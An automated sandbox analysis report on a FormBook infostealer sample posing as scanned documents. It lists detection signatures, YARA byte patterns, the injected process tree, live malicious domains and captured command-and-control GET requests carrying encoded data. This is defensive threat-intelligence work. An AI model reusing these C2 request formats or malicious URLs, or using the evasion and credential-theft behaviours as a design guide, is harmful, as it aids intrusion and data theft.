Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Scanned Docs from Emnes Metal Sdn Bhd_.exe

Overview

General Information

Sample name:Scanned Docs from Emnes Metal Sdn Bhd_.exe
Analysis ID:1488022
MD5:75d0bfd0499f3bb0c94a45a80e92476b
SHA1:af86c882a44b250a8dc8a3c116eee075351740d0
SHA256:b12b14169932a016209c31797d3a3d18a151f15615e9dc7345d36498fb7e6d07
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Scanned Docs from Emnes Metal Sdn Bhd_.exe (PID: 6696 cmdline: "C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe" MD5: 75D0BFD0499F3BB0C94A45A80E92476B)
    • svchost.exe (PID: 6744 cmdline: "C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • MHFAGZiftf.exe (PID: 2872 cmdline: "C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • schtasks.exe (PID: 7032 cmdline: "C:\Windows\SysWOW64\schtasks.exe" MD5: 48C2FE20575769DE916F48EF0676A965)
          • MHFAGZiftf.exe (PID: 2056 cmdline: "C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 1508 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.1950883710.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000001.00000002.1950883710.0000000000400000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2ddf3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x17462:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000004.00000002.4110797200.0000000002B10000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000004.00000002.4110797200.0000000002B10000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2a790:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13dff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000004.00000002.4111043032.0000000002F90000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        1.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          1.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2cff3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16662:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          1.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            1.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2ddf3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x17462:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe", CommandLine: "C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe", CommandLine|base64offset|contains: ,, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe", ParentImage: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe, ParentProcessId: 6696, ParentProcessName: Scanned Docs from Emnes Metal Sdn Bhd_.exe, ProcessCommandLine: "C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe", ProcessId: 6744, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe", CommandLine: "C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe", CommandLine|base64offset|contains: ,, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe", ParentImage: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe, ParentProcessId: 6696, ParentProcessName: Scanned Docs from Emnes Metal Sdn Bhd_.exe, ProcessCommandLine: "C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe", ProcessId: 6744, ProcessName: svchost.exe

            Snort Signatures

            Suricata Signatures

            Timestamp:2024-08-05T15:33:46.610247+0200
            SID:2855465
            Source Port:55438
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-05T15:30:29.366717+0200
            SID:2855465
            Source Port:55446
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-05T15:32:44.348060+0200
            SID:2855464
            Source Port:55419
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-05T15:32:24.598271+0200
            SID:2855465
            Source Port:55414
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-05T15:34:41.642470+0200
            SID:2855464
            Source Port:55445
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-05T15:33:11.869360+0200
            SID:2855464
            Source Port:55427
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-05T15:33:33.481112+0200
            SID:2855465
            Source Port:55434
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-05T15:31:37.858823+0200
            SID:2855464
            Source Port:55400
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-05T15:34:06.742130+0200
            SID:2855464
            Source Port:55441
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-05T15:32:32.758756+0200
            SID:2855464
            Source Port:55416
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-05T15:31:48.976689+0200
            SID:2855464
            Source Port:55403
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-05T15:33:14.394961+0200
            SID:2855464
            Source Port:55428
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-05T15:32:11.243024+0200
            SID:2855465
            Source Port:55410
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-05T15:33:44.056357+0200
            SID:2855464
            Source Port:55437
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-05T15:33:41.525809+0200
            SID:2855464
            Source Port:55436
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-05T15:31:42.990832+0200
            SID:2855465
            Source Port:55402
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-05T15:34:36.179851+0200
            SID:2855464
            Source Port:55443
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-05T15:33:25.855659+0200
            SID:2855464
            Source Port:55431
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-05T15:32:46.883713+0200
            SID:2855464
            Source Port:55420
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-05T15:34:29.154258+0200
            SID:2855465
            Source Port:55442
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-05T15:33:16.945128+0200
            SID:2855464
            Source Port:55429
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-05T15:32:57.776739+0200
            SID:2855464
            Source Port:55423
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-05T15:32:51.923298+0200
            SID:2855465
            Source Port:55422
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-05T15:33:00.271451+0200
            SID:2855464
            Source Port:55424
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-05T15:31:57.075925+0200
            SID:2855465
            Source Port:55406
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-05T15:33:02.853794+0200
            SID:2855464
            Source Port:55425
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-05T15:32:30.095906+0200
            SID:2855464
            Source Port:55415
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-05T15:31:54.186142+0200
            SID:2855464
            Source Port:55405
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-05T15:31:51.526601+0200
            SID:2855464
            Source Port:55404
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-05T15:33:05.338981+0200
            SID:2855465
            Source Port:55426
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-05T15:34:38.715086+0200
            SID:2855464
            Source Port:55444
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-05T15:32:35.190410+0200
            SID:2855464
            Source Port:55417
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-05T15:34:04.213661+0200
            SID:2855464
            Source Port:55440
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-05T15:32:07.823386+0200
            SID:2855464
            Source Port:55409
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-05T15:31:40.563497+0200
            SID:2855464
            Source Port:55401
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-05T15:34:01.680859+0200
            SID:2855464
            Source Port:55439
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-05T15:32:38.674646+0200
            SID:2855465
            Source Port:55418
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-05T15:33:19.469697+0200
            SID:2855465
            Source Port:55430
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-05T15:32:16.991396+0200
            SID:2855464
            Source Port:55411
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-05T15:33:38.983279+0200
            SID:2855464
            Source Port:55435
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-05T15:31:35.346636+0200
            SID:2855464
            Source Port:55399
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-05T15:33:30.940025+0200
            SID:2855464
            Source Port:55433
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-05T15:32:19.546018+0200
            SID:2855464
            Source Port:55412
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-05T15:32:22.070909+0200
            SID:2855464
            Source Port:55413
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-05T15:31:17.205288+0200
            SID:2855465
            Source Port:55397
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-05T15:32:05.273764+0200
            SID:2855464
            Source Port:55408
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-05T15:32:02.700047+0200
            SID:2855464
            Source Port:55407
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-05T15:32:49.398527+0200
            SID:2855464
            Source Port:55421
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-05T15:33:28.389390+0200
            SID:2855464
            Source Port:55432
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://www.rtrpodcast.online/l2ei/Avira URL Cloud: Label: malware
            Source: http://www.tqfabxah.com/zjwj/Avira URL Cloud: Label: malware
            Source: http://www.tqfabxah.com/zjwj/?efM=nHLCZn8vN2ArVDTtuX5SJ0P/P5D3rwrWV4l8hQoFqQuK0GTLFPexr5xj3EirNaSr0bv3za4OohaILLkKIoyZBj+QLQEglA9+lHyHnT+4OAarv/Cw0xbxNAM=&GTP=uhqpjxIPhAvira URL Cloud: Label: malware
            Multi AV Scanner detection for submitted file
            Source: Scanned Docs from Emnes Metal Sdn Bhd_.exeReversingLabs: Detection: 71%
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.1950883710.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4110797200.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4111043032.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1951519783.0000000003F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4111935021.0000000003C90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4111848670.0000000003200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4113899205.0000000004AE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1951562901.0000000004990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: Scanned Docs from Emnes Metal Sdn Bhd_.exeJoe Sandbox ML: detected
            Source: Scanned Docs from Emnes Metal Sdn Bhd_.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: schtasks.pdb source: svchost.exe, 00000001.00000003.1919524011.000000000361A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1919657751.0000000003649000.00000004.00000020.00020000.00000000.sdmp, MHFAGZiftf.exe, 00000003.00000003.2203925940.00000000015BB000.00000004.00000001.00020000.00000000.sdmp, MHFAGZiftf.exe, 00000003.00000003.2203925940.00000000015E4000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: MHFAGZiftf.exe, 00000003.00000002.4110802051.000000000021E000.00000002.00000001.01000000.00000005.sdmp, MHFAGZiftf.exe, 00000007.00000000.2021295588.000000000021E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: Scanned Docs from Emnes Metal Sdn Bhd_.exe, 00000000.00000003.1655348276.0000000003730000.00000004.00001000.00020000.00000000.sdmp, Scanned Docs from Emnes Metal Sdn Bhd_.exe, 00000000.00000003.1655471454.00000000038D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1951185289.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1853902441.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1951185289.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1851162976.0000000003800000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000004.00000003.1951317071.000000000332F000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000004.00000002.4112132939.0000000003680000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000004.00000002.4112132939.000000000381E000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000004.00000003.1953664932.00000000034D9000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Scanned Docs from Emnes Metal Sdn Bhd_.exe, 00000000.00000003.1655348276.0000000003730000.00000004.00001000.00020000.00000000.sdmp, Scanned Docs from Emnes Metal Sdn Bhd_.exe, 00000000.00000003.1655471454.00000000038D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1951185289.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1853902441.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1951185289.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1851162976.0000000003800000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, schtasks.exe, 00000004.00000003.1951317071.000000000332F000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000004.00000002.4112132939.0000000003680000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000004.00000002.4112132939.000000000381E000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000004.00000003.1953664932.00000000034D9000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: schtasks.exe, 00000004.00000002.4112702566.0000000003CAC000.00000004.10000000.00040000.00000000.sdmp, schtasks.exe, 00000004.00000002.4111169499.0000000003113000.00000004.00000020.00020000.00000000.sdmp, MHFAGZiftf.exe, 00000007.00000002.4112168789.00000000026AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2240961982.000000000199C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: schtasks.pdbGCTL source: svchost.exe, 00000001.00000003.1919524011.000000000361A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1919657751.0000000003649000.00000004.00000020.00020000.00000000.sdmp, MHFAGZiftf.exe, 00000003.00000003.2203925940.00000000015BB000.00000004.00000001.00020000.00000000.sdmp, MHFAGZiftf.exe, 00000003.00000003.2203925940.00000000015E4000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: schtasks.exe, 00000004.00000002.4112702566.0000000003CAC000.00000004.10000000.00040000.00000000.sdmp, schtasks.exe, 00000004.00000002.4111169499.0000000003113000.00000004.00000020.00020000.00000000.sdmp, MHFAGZiftf.exe, 00000007.00000002.4112168789.00000000026AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2240961982.000000000199C000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002EDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_002EDBBE
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002F68EE FindFirstFileW,FindClose,0_2_002F68EE
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002F698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_002F698F
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002ED076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_002ED076
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002ED3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_002ED3A9
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002F9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_002F9642
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002F979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_002F979D
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002F9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_002F9B2B
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002F5C97 FindFirstFileW,FindNextFileW,FindClose,0_2_002F5C97
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_02B2BAB0 FindFirstFileW,FindNextFileW,FindClose,4_2_02B2BAB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then xor esi, esi1_2_004182BA
            Source: C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exeCode function: 4x nop then xor esi, esi3_2_03E9C195
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4x nop then xor eax, eax4_2_02B19720
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4x nop then xor esi, esi4_2_02B24C57
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4x nop then mov ebx, 00000004h4_2_03320548
            Source: Joe Sandbox ViewIP Address: 217.116.0.191 217.116.0.191
            Source: Joe Sandbox ViewIP Address: 76.223.67.189 76.223.67.189
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exeCode function: 0_2_002FCE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_002FCE44
            Source: global trafficHTTP traffic detected: GET /toda/?GTP=uhqpjxIPh&efM=obOL9JCgNxwS4++cuMdB8oKy9gH02j2g0sHVZkybihQ0FoV35C0OF1DRqfJh8iiswTwJQUV87m+YN/qkLbPeZjD4+ekebMUnDMBnOUVwsozzcXjkZdwt+Kw= HTTP/1.1Host: www.stemfiniti.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
            Source: global trafficHTTP traffic detected: GET /pjmu/?efM=zh3d17Jww7lUdSTn18h3AW52xQeHiultGm9RdVCgVGhfN4W3cKL6T1z80tBiQSN9EuR6w+tbLdSr4eDL0g7GYgJ6QddEnX3CYXXMD+mGHjpcx+XzQAKiSmY=&GTP=uhqpjxIPh HTTP/1.1Host: www.zhuan-tou.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
            Source: global trafficHTTP traffic detected: GET /7ffx/?GTP=uhqpjxIPh&efM=bNQ0/ONSUiz8CveulmeeGbtq+RYAIRndZ9NU1FoLXha3tv70s5bqu4Q6Bv5eGpaoTDYvbrT1RjV74F6wZTVOAhq5NAvf33Q9AnwF2+P6bz1BMUvu37pM7qc= HTTP/1.1Host: www.lecoinsa.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
            Source: global trafficHTTP traffic detected: GET /1nsp/?efM=6szqGuj1zCBS7eEVX649iJVBUL/fWzE2u/M2YSpUojnZUd8wkmCllhvxE7Evl1FAmV96l4GO8z837fuNk080Ir9qaLZUnG7yNOEpMTkzRXgFx77GcbRli0I=&GTP=uhqpjxIPh HTTP/1.1Host: www.8xbe578.appAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
